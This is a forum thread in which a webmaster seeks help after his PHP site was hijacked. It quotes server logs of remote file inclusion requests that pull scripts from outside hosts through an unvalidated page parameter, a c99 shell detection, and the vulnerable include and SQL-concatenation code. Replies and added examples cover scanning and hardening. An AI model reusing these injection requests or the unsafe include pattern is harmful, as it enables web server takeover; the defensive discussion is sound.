
Web server hacked

Status
Not open for further replies.

pdbowling

Programmer
Mar 28, 2003
267
US
Hello, everyone.

I have a php web site.
It got hacked and several things happened.

The index.php was replaced with a new file.
A new file was uploaded. csvxunon.php that was full of hacker code (the security admins deleted before I could get a copy sorry).

So, I changed my password and emailed the security team.

At best, I got a cryptic response. I am sure that the information is useful, but if I have to fix one of my php scripts to make it secure, I'm going to need to know which one it is. There are hundreds of pages.

So if anyone can make sense of these log files, I'd really love to hear from you.

I'll include both tech responses, but the second at least narrows down the tech's opinion of the lines where the breach occurs. I removed my domain and user names for safety and modified the IPs in case those are my hosting company's IPs.

Code:
Your account is being compromised through an insecure script on the account. You should either remove this script or see if there is a newer version of the script available.


/home/xeditedx/public_html/xdomainEditedx/cvsxunon.php:HG-PHPSHELL.c99.Fragment.AB FOUND


XX.YYY.1Y0.Z /index.php?pagedb=privacy//?page=http://jaramadonna.altervista.org/id.txt? 503
XXX.34.1Y3.Z2 //?page=http://www.domsete.com.br/dom730/images/mambo??? 200
XXX.34.1Y3.Z2 //?page=http://www.domsete.com.br/dom730/images/joomla??? 200
XXX.1Y2.9Z.2zz //?page=http://h1.ripway.com/egre23/egre.txt??? 503

...hundreds of lines of this stuff ....

First, are those IPs for the web server company hosting my site, or for hacker tools?

The second response
Code:
Hello, Yes we removed the file already. As to how it got there, please refer to the previously provided logs:

X7.Y01.3Y.ZZ1 //?page=http%3A%2F%2Fcodedviro.50webs.com%2Fmypass.php%3F%3F&act=img&img=home 200
X7.Y01.3Y.ZZ1 //?page=http%3A%2F%2Fcodedviro.50webs.com%2Fmypass.php%3F%3F&act=img&img=forward 200
X7.Y01.3Y.ZZ1 //?page=http%3A%2F%2Fcodedviro.50webs.com%2Fmypass.php%3F%3F&act=img&img=back 200
X7.Y01.3Y.ZZ1 //?page=http%3A%2F%2Fcodedviro.50webs.com%2Fmypass.php%3F%3F&act=img&img=refresh 200
67.201.38.211 //?page=http%3A%2F%2Fcodedviro.50webs.com%2Fmypass.php%3F%3F&act=img&img=up 200

That is a snippet of how your account is getting exploited. It looks like one of your scripts parses through a ?page variable that is getting exploited.

Where do I begin to look for the code that is being exploited in this way? I've got hundreds of php files with scripts in them, and the security tech is not being helpful any more. I don't mind researching and fixing it myself, but goodness, where do I start? There is a log file on the server as well showing many reported errors while the attack was happening.

Code:
[13-Jul-2008 23:18:02] PHP Warning:  include() [<a href='function.include'>function.include</a>]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/myUsername/public_html/myDomain/index.php on line 23

[13-Jul-2008 23:18:02] PHP Warning:  include(http://dolkenyot.caem??.php) [<a href='function.include'>function.include</a>]: failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/myUserName/public_html/myDomain/index.php on line 23

..pages of this stuff..

 
the log file should tell you which file/script is being exploited.

If you need to discover which file is misusing $_GET variables, then write a script to search iteratively through each database and file and log the results of $_GET usage. That will at least narrow it down. My code editor (Aptana) does this for me, and I know that Dreamweaver would also.
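The search script suggested above, as an added example that is not code from the thread or the site: a PHP 7 command-line grep over a web root for the two sink types in this incident, an include/require fed from a request superglobal and a SQL string built from one. The scanned path is a placeholder argument.

```php
<?php
// Added example, not code from the thread or the site: a line-oriented grep over a
// PHP tree for the two sink types in this incident, an include/require whose
// argument comes from a request superglobal and a SQL string built from one.
// Usage: php find_sinks.php /home/USER/public_html   (path is a placeholder)

const TAINT = '\$_(?:GET|POST|REQUEST|COOKIE)\b';

// Each pattern fires only when the sink and the tainted read share one statement.
$patterns = [
    'dynamic include'       => '/\b(?:include|require)(?:_once)?\b[^;]*' . TAINT . '/i',
    'query call with input' => '/\b(?:mysql_query|mysqli_query|->query)\s*\([^;]*' . TAINT . '/i',
    'SQL string with input' => '/["\']\s*(?:SELECT|INSERT|UPDATE|DELETE)\b[^;]*' . TAINT . '/i',
];

function scanFile(string $path, array $patterns): array
{
    $hits = [];
    $lines = file($path, FILE_IGNORE_NEW_LINES);
    if ($lines === false) {
        return $hits;                       // unreadable file: skip, do not abort
    }
    foreach ($lines as $n => $line) {
        foreach ($patterns as $label => $re) {
            if (preg_match($re, $line) === 1) {
                $hits[] = sprintf('%s:%d [%s] %s', $path, $n + 1, $label, trim($line));
            }
        }
    }
    return $hits;
}

function scanTree(string $root, array $patterns): array
{
    $hits = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (preg_match('/\.(?:php|inc|phtml)$/i', $file->getFilename()) === 1) {
            $hits = array_merge($hits, scanFile($file->getPathname(), $patterns));
        }
    }
    return $hits;
}

$root = isset($argv[1]) ? $argv[1] : '.';
foreach (scanTree($root, $patterns) as $hit) {
    echo $hit, PHP_EOL;
}
```

Run against the code quoted later in this thread it reports the `include($_GET["page"].".php")` line and the `$sql="SELECT ... ".$_GET["pagedb"]` line. With register_globals on, as on this site, a request parameter also arrives as a plain variable such as `$page`, so a sink that reads that variable instead of `$_GET` is not reported; a clean scan narrows the search but does not prove a file safe.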
 
You are not telling a very important thing: who wrote the "hundred pages" of scripts? If it is written by you, you know where to start (with a page parameter that is not validated). If it is a 3rd-party application, then either tell them what happened or search for known issues about that software.

Furthermore, it seems that URL wrappers are switched on if your page parameter can be abused this way. Is that really necessary? It is a security risk and leads exactly to your situation for unsafe code.

+++ Despite being wrong in every important aspect, that is a very good analogy +++
Hex (in Darwin's Watch)
 
Hmm,
The code is third party and they are out of business (we see why I guess).
I found the code calling the insecure functions. I turned off register_globals and the site won't even run. Then I turned off allow_url_fopen and that disables the site as well. Other than it being just plain bad code, is there some method of securing this function?

Code:
if ($_GET["page"]=='')
 if ($_GET["pagedb"]!='')
 {
   // pagedb is concatenated straight into the query string: SQL injection
   $sql="SELECT * FROM document_master where doc_title='".$_GET["pagedb"]."'";
   $cmd = mysql_query($sql);
   $rs = mysql_fetch_array($cmd);?>
   <br><?=getsettings(8,"",2);?><br><br>
   <?echo $rs["doc_content"];
 }
 else
 {
   include("home.php"); 
 }
else
{
   // page is used directly as an include path; with URL wrappers enabled this is
   // the remote file inclusion the logs show (?page=http://...)
   include($_GET["page"].".php"); 
}
?>
<?include("footer.php"); ?>


Here's the .htaccess file where I turned those parameters off. I also tried changing allow from all to deny to all and then allow valid user. Both killed the site.

Code:
# -FrontPage-

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

RewriteEngine on
RewriteRule ^category(.*).html$ index.php?page=category&category_id=$1 [L]
RewriteRule ^article(.*).html$ index.php?page=article&article_id=$1 [L]
RewriteRule ^page_(.*).html$ index.php?pagedb=$1 [L]
RewriteRule ^index.html$ index.php

<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>

What really sucks is that I've put so much effort into advertising this site and I may have to take it down because it's just not safe. Grrr.
Thanks, everyone.
Patrick

 
What I would do is instead of just calling:
Code:
include($_GET["page"].".php");
I would verify that the $_GET["page"] variable is a valid destination. This can be done using the file_exists function - if it doesn't exist then don't include it.

It sounds like someone figured out the scheme and passed their own value for the "page" variable, and caused your script to include something harmful. By verifying the "page" variable before you include it you can prevent this.
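A hardened form of the dispatcher quoted earlier in this thread, as an added example that is not the site's or the thread's code (PHP 7.1 or later; PDO replaces the mysql_* functions, which no longer exist). The allowlist keys follow the .htaccess rewrite rules (page=category, page=article) plus home; the DSN, credentials and the omitted getsettings() markup are placeholders or assumptions.

```php
<?php
// Added example, not the site's or the thread's code: a hardened form of the
// dispatcher quoted above. The allowlist keys come from the .htaccess rewrite
// rules (page=category, page=article) plus home; the DSN, credentials and the
// getsettings() markup are placeholders or omitted.

// The page parameter selects a key in a fixed map, never a path. file_exists()
// alone would reject a remote URL but still accept ../ to any local .php file,
// which is why the value is looked up rather than checked for existence.
const PAGES = [
    'home'     => 'home.php',
    'category' => 'category.php',
    'article'  => 'article.php',
];

function resolvePage(string $requested): string
{
    // Unknown keys (URLs, traversal, null bytes, empty) all fall back to home.
    return array_key_exists($requested, PAGES) ? PAGES[$requested] : PAGES['home'];
}

// pagedb is data, so it reaches MySQL as a bound parameter; the concatenated
// mysql_query() call in the original is an SQL injection as well.
function fetchDocument(PDO $db, string $title): ?string
{
    $stmt = $db->prepare('SELECT doc_content FROM document_master WHERE doc_title = ?');
    $stmt->execute([$title]);
    $content = $stmt->fetchColumn();
    return $content === false ? null : (string) $content;
}

$page   = (string) ($_GET['page'] ?? '');
$pagedb = (string) ($_GET['pagedb'] ?? '');

if ($page === '' && $pagedb !== '') {
    // Placeholder DSN and credentials.
    $db = new PDO('mysql:host=localhost;dbname=SITE_DB', 'DB_USER', 'DB_PASSWORD');
    $content = fetchDocument($db, $pagedb);
    // The original echoes stored HTML as-is; that is acceptable only if
    // doc_content is written by trusted authors.
    echo $content ?? '<p>Document not found.</p>';
} else {
    include __DIR__ . '/' . resolvePage($page);
}
include __DIR__ . '/footer.php';
```

Keeping allow_url_include off, and allow_url_fopen off wherever nothing else needs it, remains worthwhile as a second layer: a later coding mistake then cannot turn into the remote include the logs show.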
 
OK. I would advise you to take such a vulnerable site off-line, especially after hackers have found and abused it. But it probably does something important when it is not hacked.

To repair the situation, copy the whole site to a local PC (preferably within the safe boundaries of a company network). This PC must of course have a web server and MySQL installed: a web development machine. Copy the database also. Just to make sure, change all e-mail addresses into a company address (so you won't be spamming anyone when testing).

Now, put register_globals and allow_url_fopen OFF on your development PC, and switch all error messages ON, and test the local site. Your screen will probably light up red, but you should be able to see where you must repair the site.

+++ Despite being wrong in every important aspect, that is a very good analogy +++
Hex (in Darwin's Watch)
 